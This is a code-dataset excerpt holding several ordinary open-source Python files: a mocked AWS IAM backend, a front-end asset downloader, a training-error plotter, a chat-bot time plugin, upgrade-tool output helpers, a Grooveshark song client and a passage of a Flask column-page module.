repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
zonk1024/moto | moto/iam/models.py | 3 | 15061 | from __future__ import unicode_literals
from moto.core import BaseBackend
from .exceptions import IAMNotFoundException, IAMConflictException, IAMReportNotPresentException
from .utils import random_access_key, random_alphanumeric, random_resource_id
from datetime import datetime
import base64
class Role(object):
def __init__(self, role_id, name, assume_role_policy_document, path):
self.id = role_id
self.name = name
self.assume_role_policy_document = assume_role_policy_document
self.path = path
self.policies = {}
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
role = iam_backend.create_role(
role_name=resource_name,
assume_role_policy_document=properties['AssumeRolePolicyDocument'],
path=properties['Path'],
)
policies = properties.get('Policies', [])
for policy in policies:
policy_name = policy['PolicyName']
policy_json = policy['PolicyDocument']
role.put_policy(policy_name, policy_json)
return role
def put_policy(self, policy_name, policy_json):
self.policies[policy_name] = policy_json
@property
def physical_resource_id(self):
return self.id
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class InstanceProfile(object):
def __init__(self, instance_profile_id, name, path, roles):
self.id = instance_profile_id
self.name = name
self.path = path
self.roles = roles if roles else []
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
role_ids = properties['Roles']
return iam_backend.create_instance_profile(
name=resource_name,
path=properties['Path'],
role_ids=role_ids,
)
@property
def physical_resource_id(self):
return self.name
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class Certificate(object):
def __init__(self, cert_name, cert_body, private_key, cert_chain=None, path=None):
self.cert_name = cert_name
self.cert_body = cert_body
self.private_key = private_key
self.path = path
self.cert_chain = cert_chain
@property
def physical_resource_id(self):
return self.name
class AccessKey(object):
def __init__(self, user_name):
self.user_name = user_name
self.access_key_id = random_access_key()
self.secret_access_key = random_alphanumeric(32)
self.status = 'Active'
self.create_date = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'SecretAccessKey':
return self.secret_access_key
raise UnformattedGetAttTemplateException()
class Group(object):
def __init__(self, name, path='/'):
self.name = name
self.id = random_resource_id()
self.path = path
self.created = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
self.users = []
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class User(object):
def __init__(self, name, path='/'):
self.name = name
self.id = random_resource_id()
self.path = path
self.created = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
self.arn = 'arn:aws:iam::123456789012:user/{0}'.format(name)
self.policies = {}
self.access_keys = []
self.password = None
def get_policy(self, policy_name):
policy_json = None
try:
policy_json = self.policies[policy_name]
except KeyError:
raise IAMNotFoundException("Policy {0} not found".format(policy_name))
return {
'policy_name': policy_name,
'policy_document': policy_json,
'user_name': self.name,
}
def put_policy(self, policy_name, policy_json):
self.policies[policy_name] = policy_json
def delete_policy(self, policy_name):
if policy_name not in self.policies:
raise IAMNotFoundException("Policy {0} not found".format(policy_name))
del self.policies[policy_name]
def create_access_key(self):
access_key = AccessKey(self.name)
self.access_keys.append(access_key)
return access_key
def get_all_access_keys(self):
return self.access_keys
def delete_access_key(self, access_key_id):
for key in self.access_keys:
if key.access_key_id == access_key_id:
self.access_keys.remove(key)
break
else:
raise IAMNotFoundException("Key {0} not found".format(access_key_id))
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
def to_csv(self):
date_format = '%Y-%m-%dT%H:%M:%S+00:00'
date_created = datetime.strptime(self.created, '%Y-%m-%d-%H-%M-%S')
# aagrawal,arn:aws:iam::509284790694:user/aagrawal,2014-09-01T22:28:48+00:00,true,2014-11-12T23:36:49+00:00,2014-09-03T18:59:00+00:00,N/A,false,true,2014-09-01T22:28:48+00:00,false,N/A,false,N/A,false,N/A
if not self.password:
password_enabled = 'false'
password_last_used = 'not_supported'
else:
password_enabled = 'true'
password_last_used = 'no_information'
if len(self.access_keys) == 0:
access_key_1_active = 'false'
access_key_1_last_rotated = 'N/A'
access_key_2_active = 'false'
access_key_2_last_rotated = 'N/A'
elif len(self.access_keys) == 1:
access_key_1_active = 'true'
access_key_1_last_rotated = date_created.strftime(date_format)
access_key_2_active = 'false'
access_key_2_last_rotated = 'N/A'
else:
access_key_1_active = 'true'
access_key_1_last_rotated = date_created.strftime(date_format)
access_key_2_active = 'true'
access_key_2_last_rotated = date_created.strftime(date_format)
return '{0},{1},{2},{3},{4},{5},not_supported,false,{6},{7},{8},{9},false,N/A,false,N/A'.format(self.name,
self.arn,
date_created.strftime(date_format),
password_enabled,
password_last_used,
date_created.strftime(date_format),
access_key_1_active,
access_key_1_last_rotated,
access_key_2_active,
access_key_2_last_rotated
)
class IAMBackend(BaseBackend):
def __init__(self):
self.instance_profiles = {}
self.roles = {}
self.certificates = {}
self.groups = {}
self.users = {}
self.credential_report = None
super(IAMBackend, self).__init__()
def create_role(self, role_name, assume_role_policy_document, path):
role_id = random_resource_id()
role = Role(role_id, role_name, assume_role_policy_document, path)
self.roles[role_id] = role
return role
def get_role_by_id(self, role_id):
return self.roles.get(role_id)
def get_role(self, role_name):
for role in self.get_roles():
if role.name == role_name:
return role
raise IAMNotFoundException("Role {0} not found".format(role_name))
def get_roles(self):
return self.roles.values()
def put_role_policy(self, role_name, policy_name, policy_json):
role = self.get_role(role_name)
role.put_policy(policy_name, policy_json)
def get_role_policy(self, role_name, policy_name):
role = self.get_role(role_name)
for p, d in role.policies.items():
if p == policy_name:
return p, d
def list_role_policies(self, role_name):
role = self.get_role(role_name)
return role.policies.keys()
def create_instance_profile(self, name, path, role_ids):
instance_profile_id = random_resource_id()
roles = [iam_backend.get_role_by_id(role_id) for role_id in role_ids]
instance_profile = InstanceProfile(instance_profile_id, name, path, roles)
self.instance_profiles[instance_profile_id] = instance_profile
return instance_profile
def get_instance_profile(self, profile_name):
for profile in self.get_instance_profiles():
if profile.name == profile_name:
return profile
def get_instance_profiles(self):
return self.instance_profiles.values()
def get_instance_profiles_for_role(self, role_name):
found_profiles = []
for profile in self.get_instance_profiles():
if len(profile.roles) > 0:
if profile.roles[0].name == role_name:
found_profiles.append(profile)
return found_profiles
def add_role_to_instance_profile(self, profile_name, role_name):
profile = self.get_instance_profile(profile_name)
role = self.get_role(role_name)
profile.roles.append(role)
def get_all_server_certs(self, marker=None):
return self.certificates.values()
def upload_server_cert(self, cert_name, cert_body, private_key, cert_chain=None, path=None):
certificate_id = random_resource_id()
cert = Certificate(cert_name, cert_body, private_key, cert_chain, path)
self.certificates[certificate_id] = cert
return cert
def get_server_certificate(self, name):
for key, cert in self.certificates.items():
if name == cert.cert_name:
return cert
def create_group(self, group_name, path='/'):
if group_name in self.groups:
raise IAMConflictException("Group {0} already exists".format(group_name))
group = Group(group_name, path)
self.groups[group_name] = group
return group
def get_group(self, group_name, marker=None, max_items=None):
group = None
try:
group = self.groups[group_name]
except KeyError:
raise IAMNotFoundException("Group {0} not found".format(group_name))
return group
def list_groups(self):
return self.groups.values()
def get_groups_for_user(self, user_name):
user = self.get_user(user_name)
groups = []
for group in self.list_groups():
if user in group.users:
groups.append(group)
return groups
def create_user(self, user_name, path='/'):
if user_name in self.users:
raise IAMConflictException("EntityAlreadyExists", "User {0} already exists".format(user_name))
user = User(user_name, path)
self.users[user_name] = user
return user
def get_user(self, user_name):
user = None
try:
user = self.users[user_name]
except KeyError:
raise IAMNotFoundException("User {0} not found".format(user_name))
return user
def create_login_profile(self, user_name, password):
# This does not currently deal with PasswordPolicyViolation.
user = self.get_user(user_name)
if user.password:
raise IAMConflictException("User {0} already has password".format(user_name))
user.password = password
def add_user_to_group(self, group_name, user_name):
user = self.get_user(user_name)
group = self.get_group(group_name)
group.users.append(user)
def remove_user_from_group(self, group_name, user_name):
group = self.get_group(group_name)
user = self.get_user(user_name)
try:
group.users.remove(user)
except ValueError:
raise IAMNotFoundException("User {0} not in group {1}".format(user_name, group_name))
def get_user_policy(self, user_name, policy_name):
user = self.get_user(user_name)
policy = user.get_policy(policy_name)
return policy
def put_user_policy(self, user_name, policy_name, policy_json):
user = self.get_user(user_name)
user.put_policy(policy_name, policy_json)
def delete_user_policy(self, user_name, policy_name):
user = self.get_user(user_name)
user.delete_policy(policy_name)
def create_access_key(self, user_name=None):
user = self.get_user(user_name)
key = user.create_access_key()
return key
def get_all_access_keys(self, user_name, marker=None, max_items=None):
user = self.get_user(user_name)
keys = user.get_all_access_keys()
return keys
def delete_access_key(self, access_key_id, user_name):
user = self.get_user(user_name)
user.delete_access_key(access_key_id)
def delete_user(self, user_name):
try:
del self.users[user_name]
except KeyError:
raise IAMNotFoundException("User {0} not found".format(user_name))
def report_generated(self):
return self.credential_report
def generate_report(self):
self.credential_report = True
def get_credential_report(self):
if not self.credential_report:
raise IAMReportNotPresentException("Credential report not present")
report = 'user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_2_active,access_key_2_last_rotated,cert_1_active,cert_1_last_rotated,cert_2_active,cert_2_last_rotated\n'
for user in self.users:
report += self.users[user].to_csv()
return base64.b64encode(report.encode('ascii')).decode('ascii')
iam_backend = IAMBackend()
| apache-2.0 | 1,491,481,025,047,319,300 | 34.107226 | 300 | 0.614036 | false | 3.735367 | false | false | false |
ulikoehler/Translatron | download-assets.py | 1 | 3048 | #!/usr/bin/env python3
"""
Downloads assets to the static directory.
This is used to allow easier updating without having to clog the git repository
with frequently updated minified JS/CSS
"""
import urllib.request
import os
import sys
from ansicolor import black, red
from collections import namedtuple
Asset = namedtuple("Asset", ["filename", "url"])
assets = [
#Bootstrap
Asset("css/bootstrap.min.css", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"),
Asset("js/bootstrap.min.js", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"),
Asset("fonts/glyphicons-halflings-regular.eot", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.eot"),
Asset("fonts/glyphicons-halflings-regular.svg", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.svg"),
Asset("fonts/glyphicons-halflings-regular.ttf", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.ttf"),
Asset("fonts/glyphicons-halflings-regular.woff", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.woff"),
Asset("fonts/glyphicons-halflings-regular.woff2", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.woff2"),
#Angular
Asset("js/angular.min.js", "https://ajax.googleapis.com/ajax/libs/angularjs/1.3.13/angular.min.js"),
#Angular Bootstrap directives
Asset("js/angular-bootstrap.min.js", "https://angular-ui.github.io/bootstrap/ui-bootstrap-tpls-0.12.0.min.js"),
#JQuery & plugins
Asset("js/jquery.min.js", "https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"),
Asset("js/jquery.highlight.js", "https://raw.githubusercontent.com/bartaz/sandbox.js/master/jquery.highlight.js"),
]
def ensureFileIsPresent(asset, directory, forceDownload=False):
(filename, url) = asset
filepath = os.path.join(directory, filename)
if url is None: # --> no need to download
return
if not os.path.isfile(filepath) or forceDownload:
#Create directory if required
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
os.makedirs(dirname)
#Perform download
print (black("Downloading %s" % filename, bold=True))
urllib.request.urlretrieve(url, filepath)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--force-download", action="store_true", help="Force downloading assets")
parser.add_argument("-d", "--directory", default="./static", help="Directory to download (must exist)")
args = parser.parse_args()
#Check if the --directory arg is valid
if not os.path.isdir(args.directory):
print(red("%s is not a directory" % args.directory, bold=True))
sys.exit(1)
#Create subdirs if not already present
#Run download if file
for asset in assets:
ensureFileIsPresent(asset, args.directory, args.force_download) | apache-2.0 | 5,452,720,826,959,025,000 | 49.816667 | 146 | 0.712598 | false | 3.424719 | false | false | false |
vmr2117/nnet | src/neural_network/perf_graph.py | 1 | 1173 | import argparse
from database import DatabaseAccessor
from data_structures import Perf
from pylab import *
def graph(db_file, filename, ttl):
db = DatabaseAccessor(Perf, db_file)
perf_data = db.read()
save_fig(perf_data, filename, ttl)
def save_fig(perf_data, filename, ttl):
iters = range(len(perf_data)) # number of epochs
tr_errs = [ entry[1] for entry in perf_data]
vd_errs = [ entry[2] for entry in perf_data]
plot(iters, tr_errs, 'g', label = 'Training Error')
plot(iters, vd_errs, 'r', label = 'Validation Error')
legend()
xlabel('Epoch')
ylabel('Error')
title(ttl)
grid(True)
savefig(filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tool to graph the validation \
and training error collected during training phase')
parser.add_argument('database_file', help='the database file that contains \
data')
parser.add_argument('figure_file', help='graph of the data')
parser.add_argument('title', help='graph title')
args = parser.parse_args()
graph(args.database_file, args.figure_file, args.title)
| gpl-2.0 | -2,220,344,147,401,889,300 | 33.5 | 80 | 0.649616 | false | 3.631579 | false | false | false |
vk-brain/sketal | plugins/miscellaneous/misc_show_time.py | 2 | 1267 | from handler.base_plugin import CommandPlugin
import datetime
class TimePlugin(CommandPlugin):
__slots__ = ("delta", "message", "days")
def __init__(self, *commands, prefixes=None, strict=False, offseth=3, offsetm=0, message=None):
"""Answers with current date and time."""
if not commands:
commands = ("время",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
self.message = message or "Текущие дата и время по МСК:"
self.delta = datetime.timedelta(hours=offseth, minutes=offsetm)
self.days = {0: 'понедельник', 1: 'вторник', 2: 'среда', 3: 'четверг',
4: 'пятница', 5: 'суббота', 6: 'воскресенье'}
example = self.command_example()
self.description = [f"Текущее время",
f"{example} - показывает текущее время и дату."]
async def process_message(self, msg):
time = (datetime.datetime.now(datetime.timezone.utc) + self.delta)
timestr = time.strftime('%d-%m-%Y %H:%M:%S')
await msg.answer(f'{self.message}\n{timestr}\nСегодня {self.days[time.weekday()]}.')
| mit | 4,185,489,166,678,610,000 | 36.966667 | 99 | 0.605795 | false | 2.77129 | false | false | false |
leapp-to/prototype | leapp/utils/output.py | 1 | 6732 | from __future__ import print_function
import hashlib
import json
import os
import sys
from contextlib import contextmanager
from leapp.exceptions import LeappRuntimeError
from leapp.models import ErrorModel
from leapp.utils.audit import get_audit_entry
def _is_verbose():
"""Redefinition of is_verbose from leapp.libraries.stdlib.config because it leads to import errors"""
return os.getenv('LEAPP_VERBOSE', '0') == '1'
class Color(object):
reset = "\033[0m" if sys.stdout.isatty() else ""
bold = "\033[1m" if sys.stdout.isatty() else ""
red = "\033[1;31m" if sys.stdout.isatty() else ""
green = "\033[1;32m" if sys.stdout.isatty() else ""
yellow = "\033[1;33m" if sys.stdout.isatty() else ""
def pretty_block_text(string, color=Color.bold, width=60):
return "\n{color}{separator}\n{text}\n{separator}{reset}\n".format(
color=color,
separator="=" * width,
reset=Color.reset,
text=string.center(width))
@contextmanager
def pretty_block(text, target, end_text=None, color=Color.bold, width=60):
target.write(pretty_block_text(text, color=color, width=width))
target.write('\n')
yield
target.write(pretty_block_text(end_text or 'END OF {}'.format(text), color=color, width=width))
target.write('\n')
def print_error(error):
model = ErrorModel.create(json.loads(error['message']['data']))
sys.stdout.write("{red}{time} [{severity}]{reset} Actor: {actor}\nMessage: {message}\n".format(
red=Color.red, reset=Color.reset, severity=model.severity.upper(),
message=model.message, time=model.time, actor=model.actor))
if model.details:
print('Summary:')
details = json.loads(model.details)
for detail in details:
print(' {k}: {v}'.format(
k=detail.capitalize(),
v=details[detail].rstrip().replace('\n', '\n' + ' ' * (6 + len(detail)))))
def report_inhibitors(context_id):
# The following imports are required to be here to avoid import loop problems
from leapp.reporting import Flags # pylint: disable=import-outside-toplevel
from leapp.utils.report import fetch_upgrade_report_messages # pylint: disable=import-outside-toplevel
reports = fetch_upgrade_report_messages(context_id)
inhibitors = [report for report in reports if Flags.INHIBITOR in report.get('flags', [])]
if inhibitors:
text = 'UPGRADE INHIBITED'
with pretty_block(text=text, end_text=text, color=Color.red, target=sys.stdout):
print('Upgrade has been inhibited due to the following problems:')
for position, report in enumerate(inhibitors, start=1):
print('{idx:5}. Inhibitor: {title}'.format(idx=position, title=report['title']))
print('Consult the pre-upgrade report for details and possible remediation.')
def report_deprecations(context_id, start=None):
deprecations = get_audit_entry(event='deprecation', context=context_id)
if start:
start_stamp = start.isoformat() + 'Z'
deprecations = [d for d in deprecations if d['stamp'] > start_stamp]
if deprecations:
cache = set()
with pretty_block("USE OF DEPRECATED ENTITIES", target=sys.stderr, color=Color.red):
for deprecation in deprecations:
entry_data = json.loads(deprecation['data'])
# Deduplicate messages
key = hashlib.sha256(json.dumps(entry_data, sort_keys=True)).hexdigest()
if key in cache:
continue
# Add current message to the cache
cache.add(key)
# Print the message
sys.stderr.write(
'{message} @ {filename}:{lineno}\nNear: {line}\nReason: {reason}\n{separator}\n'.format(
separator='-' * 60, **entry_data)
)
def report_errors(errors):
if errors:
with pretty_block("ERRORS", target=sys.stdout, color=Color.red):
for error in errors:
print_error(error)
def report_info(report_paths, log_paths, answerfile=None, fail=False):
report_paths = [report_paths] if not isinstance(report_paths, list) else report_paths
log_paths = [log_paths] if not isinstance(report_paths, list) else log_paths
if log_paths:
sys.stdout.write("\n")
for log_path in log_paths:
sys.stdout.write("Debug output written to {path}\n".format(path=log_path))
if report_paths:
with pretty_block("REPORT", target=sys.stdout, color=Color.bold if fail else Color.green):
for report_path in report_paths:
sys.stdout.write("A report has been generated at {path}\n".format(path=report_path))
if answerfile:
sys.stdout.write("Answerfile has been generated at {}\n".format(answerfile))
def report_unsupported(devel_vars, experimental):
text = "UNSUPPORTED UPGRADE"
with pretty_block(text=text, end_text=text, target=sys.stdout, color=Color.yellow):
sys.stdout.write("Variable LEAPP_UNSUPPORTED has been detected. Proceeding at your own risk.\n")
if devel_vars:
sys.stdout.write("{yellow}Development variables{reset} have been detected:\n".format(
yellow=Color.yellow, reset=Color.reset))
for key in devel_vars:
sys.stdout.write("- {key}={value}\n".format(key=key, value=devel_vars[key]))
if experimental:
sys.stdout.write("{yellow}Experimental actors{reset} have been detected:\n".format(
yellow=Color.yellow, reset=Color.reset))
for actor in experimental:
sys.stdout.write("- {actor}\n".format(actor=actor))
@contextmanager
def beautify_actor_exception():
try:
try:
yield
except LeappRuntimeError as e:
msg = '{} - Please check the above details'.format(e.message)
sys.stderr.write("\n")
sys.stderr.write(pretty_block_text(msg, color="", width=len(msg)))
finally:
pass
def display_status_current_phase(phase):
if not _is_verbose():
print('==> Processing phase `{name}`'.format(name=phase[0].name))
def _get_description_title(actor):
lines = actor.description.strip().split('\n')
return lines[0].strip() if lines else actor.name
def display_status_current_actor(actor, designation=''):
if not _is_verbose():
print('====> * {actor}{designation}\n {title}'.format(actor=actor.name,
title=_get_description_title(actor),
designation=designation))
| lgpl-2.1 | 1,843,277,105,756,116,700 | 39.8 | 108 | 0.624183 | false | 3.84466 | false | false | false |
hedgehogarray/shared_playlist | pygrooveshark/build/lib.linux-i686-2.7/grooveshark/classes/song.py | 4 | 8810 | # -*- coding:utf-8 -*-
#
# Copyright (C) 2012, Maximilian Köhl <linuxmaxi@googlemail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
from grooveshark.const import *
class Song(object):
"""
Represents a song.
Do not use this class directly.
:param id: internal song id
:param name: name
:param artist_id: artist's id to generate an :class:`Artist` object
:param artist_name: artist's name to generate an :class:`Artist` object
:param album_id: album's id to generate an :class:`Album` object
:param album_name: album's name to generate an :class:`Album` object
:param cover_url: album's cover to generate an :class:`Album` object
:param track: track number
:param duration: estimate song duration
:param popularity: popularity
:param connection: underlying :class:`Connection` object
"""
def __init__(self, id, name, artist_id, artist_name, album_id, album_name, cover_url, track, duration, popularity, connection):
self._connection = connection
self._id = id
self._name = name
self._artist_id = artist_id
self._artist_name = artist_name
self._album_id = album_id
self._album_name = album_name
self._cover_url = cover_url
if not self._cover_url:
self._cover_url = NO_COVER_URL
self._track = track
self._duration = duration
self._popularity = popularity
self._artist = None
self._album = None
def __str__(self):
return '%s - %s - %s' % (self.name, self.artist.name, self.album.name)
@classmethod
def from_response(cls, song, connection):
return cls(song['SongID'], song['Name'] if 'Name' in song else song['SongName'], song['ArtistID'], song['ArtistName'], song['AlbumID'], song['AlbumName'],
ALBUM_COVER_URL + song['CoverArtFilename'] if song['CoverArtFilename'] else None, song['TrackNum'], song['EstimateDuration'], song['Popularity'], connection)
@classmethod
def from_export(cls, export, connection):
return cls(export['id'], export['name'], export['artist_id'], export['artist'], export['album_id'], export['album'], export['cover'],
export['track'], export['duration'], export['popularity'], connection)
@property
def id(self):
"""
internal song id
"""
return self._id
@property
def name(self):
"""
song name
"""
return self._name
@property
def artist(self):
"""
artist as :class:`Artist` object
"""
if not self._artist:
self._artist = Artist(self._artist_id, self._artist_name, self._connection)
return self._artist
@property
def album(self):
"""
album as :class:`Album` object
"""
if not self._album:
self._album = Album(self._album_id, self._album_name, self._artist_id, self._artist_name, self._cover_url, self._connection)
return self._album
@property
def track(self):
"""
track number
"""
return self._track
@property
def duration(self):
"""
estimate song duration
"""
return self._duration
@property
def popularity(self):
"""
popularity
"""
return self._popularity
@property
def stream(self):
"""
:class:`Stream` object for playing
"""
# Add song to queue
self._connection.request('addSongsToQueue',
{'songIDsArtistIDs': [{'artistID': self.artist.id,
'source': 'user',
'songID': self.id,
'songQueueSongID': 1}],
'songQueueID': self._connection.session.queue},
self._connection.header('addSongsToQueue', 'jsqueue'))
stream_info = self._connection.request('getStreamKeyFromSongIDEx', {'songID' : self.id, 'country' : self._connection.session.country,
'prefetch' : False, 'mobile' : False},
self._connection.header('getStreamKeyFromSongIDEx', 'jsqueue'))[1]
return Stream(stream_info['ip'], stream_info['streamKey'], self._connection)
def export(self):
"""
Returns a dictionary with all song information.
Use the :meth:`from_export` method to recreate the
:class:`Song` object.
"""
return {'id' : self.id, 'name' : self.name, 'artist' : self._artist_name, 'artist_id' : self._artist_id,
'album' : self._album_name, 'album_id' : self._album_id, 'track' : self.track,
'duration' : self.duration, 'popularity' : self.popularity, 'cover' : self._cover_url}
def format(self, pattern):
"""
Format the song according to certain patterns:
%a: artist title
%s: song title
%A: album title
"""
pattern = pattern.replace('%a', self.artist.name)
pattern = pattern.replace('%s', self.name)
pattern = pattern.replace('%A', self.album.name)
return pattern.replace('/', '').replace('\\', '')
def download(self, directory='~/Music', song_name='%a - %s - %A'):
"""
Download a song to a directory.
:param directory: A system file path.
:param song_name: A name that will be formatted with :meth:`format`.
:return: The formatted song name.
"""
formatted = self.format(song_name)
path = os.path.expanduser(directory) + os.path.sep + formatted + '.mp3'
try:
raw = self.safe_download()
with open(path, 'wb') as f:
f.write(raw)
except:
raise
return formatted
def safe_download(self):
"""Download a song respecting Grooveshark's API.
:return: The raw song data.
"""
def _markStreamKeyOver30Seconds(stream):
self._connection.request('markStreamKeyOver30Seconds',
{'streamServerID': stream.ip,
'artistID': self.artist.id,
'songQueueID': self._connection.session.queue,
'songID': self.id,
'songQueueSongID': 1,
'streamKey': stream.key},
self._connection.header('markStreamKeyOver30Seconds',
'jsqueue'))
stream = self.stream
timer = threading.Timer(30, _markStreamKeyOver30Seconds, [stream])
timer.start()
raw = stream.data.read()
if len(raw) == stream.size:
timer.cancel()
self._connection.request('markSongDownloadedEx',
{'streamServerID': stream.ip,
'songID': self.id,
'streamKey': stream.key},
self._connection.header('markSongDownloadedEx',
'jsqueue'))
self._connection.request('removeSongsFromQueue',
{'userRemoved':True,
'songQueueID': self._connection.session.queue,
'songQueueSongIDs': [1]},
self._connection.header('removeSongsFromQueue',
'jsqueue'))
return raw
else:
raise ValueError("Content-Length {}, but read {}"
.format(stream.size, len(raw)))
from grooveshark.classes.artist import Artist
from grooveshark.classes.album import Album
from grooveshark.classes.stream import Stream
| mit | -6,117,511,673,177,319,000 | 37.977876 | 176 | 0.537405 | false | 4.453488 | false | false | false |
NewBeeStudio/xichao-new | xichao/packages/route/special.py | 1 | 17428 | # -*- coding: utf-8 -*-
from imports import *
################################## 专栏页面 ##################################
# 专栏列表页
@app.route('/special_all', methods=['GET'])
def special_all():
try:
view = request.args.get('view')
sort = request.args.get('sort')
page_id = int(request.args.get('page'))
except Exception:
abort(404)
if sort != 'favor':
sort = 'time'
sort_change_url = '/special_all?view=%s&sort=favor&page=1'%(view)
else:
sort_change_url = '/special_all?view=%s&sort=time&page=1'%(view)
if view != 'list':
view = 'all'
view_change_url = '/special_all?view=list&sort=%s&page=1'%(sort)
else:
view_change_url = '/special_all?view=all&sort=%s&page=1'%(sort)
if view == 'list': # list view
specials_pagination = get_all_specials(sort, page_id, 5)
return render_template('special_all_listView.html', sort = sort, view=view,
specials_pagination_list = specials_pagination,
author = get_special_author,
articles = get_special_article,
sort_change_url = sort_change_url,
view_change_url = view_change_url)
else: # all view
specials_pagination = get_all_specials(sort, page_id, 12)
return render_template('special_all_allView.html', sort = sort, view=view,
specials_pagination_all = specials_pagination,
author = get_special_author,
articles = get_special_article,
sort_change_url = sort_change_url,
view_change_url = view_change_url)
#专栏列表搜索
@app.route('/special_search', methods=['GET'])
def special_search():
try:
search = request.args.get('search')
if search == '': abort(404)
except Exception:
abort(404)
specials_pagination = get_search_specials(search)
return render_template('special_search.html', specials_pagination = specials_pagination,
author = get_special_author)
# 专栏详情页
@app.route('/special', methods=['GET'])
def special():
#URL样式:http://127.0.0.1:5000/special?id=2&page=1&sort=time
try:
special_id = int(request.args.get('id'))
page_id = int(request.args.get('page'))
sort = request.args.get('sort')
except Exception:
abort(404)
#只有favor和time两种排序方式
if (sort != 'favor'):
sort = 'time'
sort_change_url = "/special?id=%d&page=1&sort=favor" % (special_id)
else:
sort_change_url = "/special?id=%d&page=1&sort=time" % (special_id)
special = get_special_information(special_id)
if (special == None):
abort(404)
author = get_special_author(special.special_id)
# print ddd
#article的分页对象,articles_pagination.items获得该分页对象中的所有内容,为一个list
login_user = get_userid_from_session()
articles_pagination = get_special_article(special_id, page_id, sort, 5)
related_other_special = get_related_special(special.special_id)
is_mobile = is_small_mobile_device(request)
if is_mobile:
return render_template('mobile_special_detail.html',
login_user_id = login_user,
is_mobile = is_mobile,
root_authorized = root_authorized(),
#author_itself = (special.user_id == login_user),
has_collected_special = get_special_collect_info(login_user, special_id),
has_collected_author = has_collected,
sort_change_url = sort_change_url,
special_id = special_id,
sort = sort,
special_favor = special.favor,
special_title = special.name,
special_author = author,
#special_author_slogon = author.slogon,
special_introduction = special.introduction,
special_style = special.style,
special_total_issue = special.total_issue,
special_update_frequency = special.update_frequency,
special_coin = special.coin,
special_image = special.picture,
#special_author_avatar = author.photo,
articles_pagination = articles_pagination,
get_nick_by_userid = get_nick_by_userid)
else:
return render_template('special_detail.html',
len = len,
author = get_special_author,
login_user_id = login_user,
is_mobile = is_mobile,
root_authorized = root_authorized(),
#author_itself = (special.user_id == login_user),
has_collected_special = get_special_collect_info(login_user, special_id),
has_collected_author = has_collected,
sort_change_url = sort_change_url,
special_id = special_id,
sort = sort,
other = get_special_author_other,
special_favor = special.favor,
special_title = special.name,
special_author = author,
#special_author_slogon = author.slogon,
special_introduction = special.introduction,
special_style = special.style,
special_total_issue = special.total_issue,
special_update_frequency = special.update_frequency,
special_coin = special.coin,
special_image = special.picture,
#special_author_avatar = author.photo,
articles_pagination = articles_pagination,
related_other_special = related_other_special,
get_nick_by_userid = get_nick_by_userid)
## 创建专栏界面
@app.route('/create_special')
@login_required
def create_special():
if (not root_authorized()):
abort(404)
return render_template('create_special.html')
## 修改专栏界面
@app.route('/modify_special')
@login_required
def modify_special():
if (not root_authorized()):
abort(404)
return render_template('modify_special.html')
## 上传专栏题图文件
@app.route('/upload_special_title_image', methods=['GET', 'POST'])
def save_special_title_image():
title_image = request.files['upload_file']
#设置默认题图
title_image_name = 'special_upload_pic.jpg'
if title_image:
if allowed_file(title_image.filename):
